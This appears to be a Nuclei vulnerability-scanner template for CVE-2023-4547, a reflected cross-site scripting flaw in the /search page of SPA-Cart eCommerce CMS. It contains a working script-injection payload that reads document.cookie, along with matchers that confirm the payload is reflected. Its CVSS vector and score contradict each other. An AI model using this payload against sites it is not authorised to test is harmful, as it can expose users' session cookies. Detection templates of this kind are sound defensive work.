44 lines
1.4 KiB
YAML
44 lines
1.4 KiB
YAML
id: CVE-2023-4547
|
|
|
|
info:
|
|
name: SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting
|
|
author: theamanrawat
|
|
severity: medium
|
|
description: |
|
|
A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.
|
|
reference:
|
|
- https://spa-cart.com
|
|
- https://cxsecurity.com/ascii/WLB-2023080090
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-4547
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 3.5
|
|
cve-id: CVE-2023-4547
|
|
cwe-id: CWE-79
|
|
metadata:
|
|
verified: "true"
|
|
tags: cve,cve2023,spa-cart,unauth,xss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/search?filtered=1&q=test&filter[price]=100-1331"><script>alert(document.cookie)</script>&filter[attr][Memory][]=16+GB'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '100-1331"><script>alert(document.cookie)</script>'
|
|
- '<table class="products-nav">'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'text/html'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|